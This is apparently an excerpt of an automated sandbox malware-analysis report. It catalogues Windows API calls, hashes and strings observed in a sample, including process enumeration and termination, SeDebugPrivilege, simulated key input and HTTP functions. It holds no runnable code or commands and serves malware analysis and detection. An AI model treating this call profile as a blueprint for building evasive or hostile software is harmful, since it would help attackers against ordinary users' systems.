                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: d6c81f05a94f56ba8305eafdfbb02d4feaabc941238824ff3750ce9c3ff2cec8
                                                                            • Instruction ID: 22978e76ebf57238b55aa65cbca96c6c0c19c47f3ce5e7fd5eac40f8062ad048
                                                                            • Opcode Fuzzy Hash: d6c81f05a94f56ba8305eafdfbb02d4feaabc941238824ff3750ce9c3ff2cec8
                                                                            • Instruction Fuzzy Hash: B5414CB1501218BFEF119F58CC89FBA7BACFB08354F10812AFA09DA145E774DE449BA5
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008862EC
                                                                            • GetWindowLongW.USER32(00E25320,000000F0), ref: 0088631F
                                                                            • GetWindowLongW.USER32(00E25320,000000F0), ref: 00886354
                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00886386
                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008863B0
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008863C1
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008863DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID: S
                                                                            • API String ID: 2178440468-2858979982
                                                                            • Opcode ID: a9e4feadb5fb12a74be1a2e2fd7627da80415fe073179479a7fbcdea393b4b7d
                                                                            • Instruction ID: 4e0066dbe208f7ccf0f29715fee1c363c70668a7af62be461a280833a72a044b
                                                                            • Opcode Fuzzy Hash: a9e4feadb5fb12a74be1a2e2fd7627da80415fe073179479a7fbcdea393b4b7d
                                                                            • Instruction Fuzzy Hash: CF31F230644251AFDB21DF18EC85F5537E1FB5A714F1902A8F601DF2B2EB71A890DB51
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0088F910), ref: 00878D28
                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0088F910), ref: 00878D5C
                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00878ED6
                                                                            • SysFreeString.OLEAUT32(?), ref: 00878F00
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                            • String ID:
                                                                            • API String ID: 560350794-0
                                                                            • Opcode ID: bfb49c104feb6fa3e9886957d5083c033e193851d89fcc55dae3f24d4de6753a
                                                                            • Instruction ID: d64a7648dfba6dd5eac75d164e1d1239e3dd5b0f9df64e2e6d87dd24b841ec7e
                                                                            • Opcode Fuzzy Hash: bfb49c104feb6fa3e9886957d5083c033e193851d89fcc55dae3f24d4de6753a
                                                                            • Instruction Fuzzy Hash: 0AF10471A00209EFDB14DF98C888AAEB7B9FF49314F108498F949EB255DB31EE45CB51
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0087F6B5
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087F848
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087F86C
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087F8AC
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087F8CE
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0087FA4A
                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0087FA7C
                                                                            • CloseHandle.KERNEL32(?), ref: 0087FAAB
                                                                            • CloseHandle.KERNEL32(?), ref: 0087FB22
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                            • String ID:
                                                                            • API String ID: 4090791747-0
                                                                            • Opcode ID: aaa1cfdc1de808878b56c8748c85ad1436021502e81fcbac56875db447e7d0fa
                                                                            • Instruction ID: f0ecc0f16ca4b6cb49dcb6fd50694b926521f3f9e8d7ab2c6eb2c4851286dc76
                                                                            • Opcode Fuzzy Hash: aaa1cfdc1de808878b56c8748c85ad1436021502e81fcbac56875db447e7d0fa
                                                                            • Instruction Fuzzy Hash: 01E1AC712042509FC714EF29C891B6ABBE1FF89354F14856DFA99DB2A2DB30DC41CB52
                                                                            APIs
                                                                              • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863697,?), ref: 0086468B
                                                                              • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863697,?), ref: 008646A4
                                                                              • Part of subcall function 00864A31: GetFileAttributesW.KERNEL32(?,0086370B), ref: 00864A32
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00864D40
                                                                            • _wcscmp.LIBCMT ref: 00864D5A
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00864D75
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 793581249-0
                                                                            • Opcode ID: 9400c719a601a4b75a5593050020b69518bbc2db0213f148f1e168051640e37d
                                                                            • Instruction ID: 1617221ef26b2f37e3814e86a3b71d7b9e881341252c2e0223aa6e740f19dd5e
                                                                            • Opcode Fuzzy Hash: 9400c719a601a4b75a5593050020b69518bbc2db0213f148f1e168051640e37d
                                                                            • Instruction Fuzzy Hash: 0C5150B24083459BC664EBA4D8819DFB7ECFF85350F00192EB689D3192EE35A588C767
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0083C2F7
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0083C319
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0083C331
                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0083C34F
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0083C370
                                                                            • DestroyIcon.USER32(00000000), ref: 0083C37F
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0083C39C
                                                                            • DestroyIcon.USER32(?), ref: 0083C3AB
                                                                              • Part of subcall function 0088A4AF: DeleteObject.GDI32(00000000), ref: 0088A4E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2819616528-0
                                                                            • Opcode ID: bd8473b795469050f521d9e7691a2075d14bc1215a930472ad5b83987350332d
                                                                            • Instruction ID: b771ce93ff4e3c74100d9dd96cf5670fb4d073b554f42d864cf3980a789fad97
                                                                            • Opcode Fuzzy Hash: bd8473b795469050f521d9e7691a2075d14bc1215a930472ad5b83987350332d
                                                                            • Instruction Fuzzy Hash: DB512970610209EFDB64DF68CC59FAA7BB5FB58320F104529F946E72E0D7B0A990DB90
                                                                            APIs
                                                                              • Part of subcall function 0085A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0085A84C
                                                                              • Part of subcall function 0085A82C: GetCurrentThreadId.KERNEL32 ref: 0085A853
                                                                              • Part of subcall function 0085A82C: AttachThreadInput.USER32(00000000,?,00859683,?,00000001), ref: 0085A85A
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085968E
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008596AB
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008596AE
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 008596B7
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008596D5
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008596D8
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 008596E1
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008596F8
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008596FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 54e746c9a0388225e78e42b90c28a44cd57cdfd6dbd436a795aa8fe7e26eca82
                                                                            • Instruction ID: 560a666a6af6d6efb5327a8a48e5cdda5256998ce49bdeb11b68c29a241c66c6
                                                                            • Opcode Fuzzy Hash: 54e746c9a0388225e78e42b90c28a44cd57cdfd6dbd436a795aa8fe7e26eca82
                                                                            • Instruction Fuzzy Hash: 0B11CEB1A10218BEFA106B689C89F6A3A2DFB4C752F100525F744EB0A1C9F25C10DBA4
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0085853C,00000B00,?,?), ref: 0085892A
                                                                            • HeapAlloc.KERNEL32(00000000,?,0085853C,00000B00,?,?), ref: 00858931
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0085853C,00000B00,?,?), ref: 00858946
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,0085853C,00000B00,?,?), ref: 0085894E
                                                                            • DuplicateHandle.KERNEL32(00000000,?,0085853C,00000B00,?,?), ref: 00858951
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0085853C,00000B00,?,?), ref: 00858961
                                                                            • GetCurrentProcess.KERNEL32(0085853C,00000000,?,0085853C,00000B00,?,?), ref: 00858969
                                                                            • DuplicateHandle.KERNEL32(00000000,?,0085853C,00000B00,?,?), ref: 0085896C
                                                                            • CreateThread.KERNEL32(00000000,00000000,00858992,00000000,00000000,00000000), ref: 00858986
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: 044bba99d684d3f3ed3bb26fb1c2552249d06fdc1f6aaef271cdc4bddad81979
                                                                            • Instruction ID: d7bafcd81ea3e68574c7d8842ef06bf9d5c908ab31372e89d7f910a83d806b02
                                                                            • Opcode Fuzzy Hash: 044bba99d684d3f3ed3bb26fb1c2552249d06fdc1f6aaef271cdc4bddad81979
                                                                            • Instruction Fuzzy Hash: E601AC75240304FFE611ABA9DC8DF677B6CFB89711F404421FB05DB191CA74A8108B20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: a0b0fc1ce4362fee8fa657d6917617ef9179793848d4b37aafb8c7785ce261f0
                                                                            • Instruction ID: 8dce0ed1e1dab6d89c18ed6916c78ce29d310dfd7e87aa31a7513c453178fa55
                                                                            • Opcode Fuzzy Hash: a0b0fc1ce4362fee8fa657d6917617ef9179793848d4b37aafb8c7785ce261f0
                                                                            • Instruction Fuzzy Hash: 6BC1A271A0021A9FDF10DF98D884AAEB7F5FB88314F158469E949EB285E770ED44CB90
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$_memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2862541840-625585964
                                                                            • Opcode ID: 4f5b75c55a0f537343812f83045185c08a6ae60919a4422a647fc972c1535704
                                                                            • Instruction ID: bec37376e6e3795b16e76504e989bcc43928956bba14f4dcb69b93c7943d61a9
                                                                            • Opcode Fuzzy Hash: 4f5b75c55a0f537343812f83045185c08a6ae60919a4422a647fc972c1535704
                                                                            • Instruction Fuzzy Hash: 5C918A71A00219ABDF20DFA5C888FAEBBB8FF45714F108159F559EB289D770D944CBA0
                                                                            APIs
                                                                              • Part of subcall function 0085710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?,?,00857455), ref: 00857127
                                                                              • Part of subcall function 0085710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 00857142
                                                                              • Part of subcall function 0085710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 00857150
                                                                              • Part of subcall function 0085710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?), ref: 00857160
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00879806
                                                                            • _memset.LIBCMT ref: 00879813
                                                                            • _memset.LIBCMT ref: 00879956
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00879982
                                                                            • CoTaskMemFree.OLE32(?), ref: 0087998D
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 008799DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1300414916-2785691316
                                                                            • Opcode ID: 8e08209c95643da5d718b7c51bc5d19e7db61cf651be2907c89d086659cfd28a
                                                                            • Instruction ID: 8341f7367009b2c6d2b6e690e72dfa08e04d3a8733e819832963299f9a3c8f46
                                                                            • Opcode Fuzzy Hash: 8e08209c95643da5d718b7c51bc5d19e7db61cf651be2907c89d086659cfd28a
                                                                            • Instruction Fuzzy Hash: 0B91F671D00229EBDB10DFA9DC45ADEBBB9FF08310F108169E519E7291EB719A44CFA1
                                                                            APIs
                                                                              • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                                            • _memset.LIBCMT ref: 00862B87
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00862BB6
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00862C69
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00862C97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                            • String ID: 0$HS$HS
                                                                            • API String ID: 4152858687-3747361957
                                                                            • Opcode ID: 04330ae6c93212852531c8114b39e3f0639edd1cd2d5fb7c8591543be133cffe
                                                                            • Instruction ID: 19428ade184248846eb91714aeb07b9039d9805b8e9a9aeb02eb043adc1d07a0
                                                                            • Opcode Fuzzy Hash: 04330ae6c93212852531c8114b39e3f0639edd1cd2d5fb7c8591543be133cffe
                                                                            • Instruction Fuzzy Hash: 0651EE71208B119FC7249F28D845A6FB7E8FF98320F050AADF890D6291DB70CC44CB92
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00886E24
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00886E38
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00886E52
                                                                            • _wcscat.LIBCMT ref: 00886EAD
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00886EC4
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00886EF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: 202ecb9ab9681ed51818631790a656d2f118467d66ac66e9c27ff9082f02ec2e
                                                                            • Instruction ID: 00d5950fbb8bfb295f71b7a87d15da12e1622a41103c975cddcd66d961af68e1
                                                                            • Opcode Fuzzy Hash: 202ecb9ab9681ed51818631790a656d2f118467d66ac66e9c27ff9082f02ec2e
                                                                            • Instruction Fuzzy Hash: 87419471A00348ABDF21EF68CC85BEE77A8FF08350F10056AF694D7292E6729D94CB50
                                                                            APIs
                                                                              • Part of subcall function 00863C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00863C7A
                                                                              • Part of subcall function 00863C55: Process32FirstW.KERNEL32(00000000,?), ref: 00863C88
                                                                              • Part of subcall function 00863C55: CloseHandle.KERNEL32(00000000), ref: 00863D52
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087E9A4
                                                                            • GetLastError.KERNEL32 ref: 0087E9B7
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087E9E6
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0087EA63
                                                                            • GetLastError.KERNEL32(00000000), ref: 0087EA6E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0087EAA3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: f9d977896a22cc74408963a6915b6b4a5add0a6b91563ef8ddc6abb808949e66
                                                                            • Instruction ID: 31780fb804d12a5b1c32d8ad4df129beb093b8b8fa72b25f90b2ea19fa0407c8
                                                                            • Opcode Fuzzy Hash: f9d977896a22cc74408963a6915b6b4a5add0a6b91563ef8ddc6abb808949e66
                                                                            • Instruction Fuzzy Hash: 2D4178712002009FDB11EF28CC95B69BBA5FF58314F048468FA4ADB3D2DB74E848CB96
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 008872AA
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887351
                                                                            • IsMenu.USER32(?), ref: 00887369
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008873B1
                                                                            • DrawMenuBar.USER32 ref: 008873C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                            • String ID: S$0
                                                                            • API String ID: 3866635326-770256432
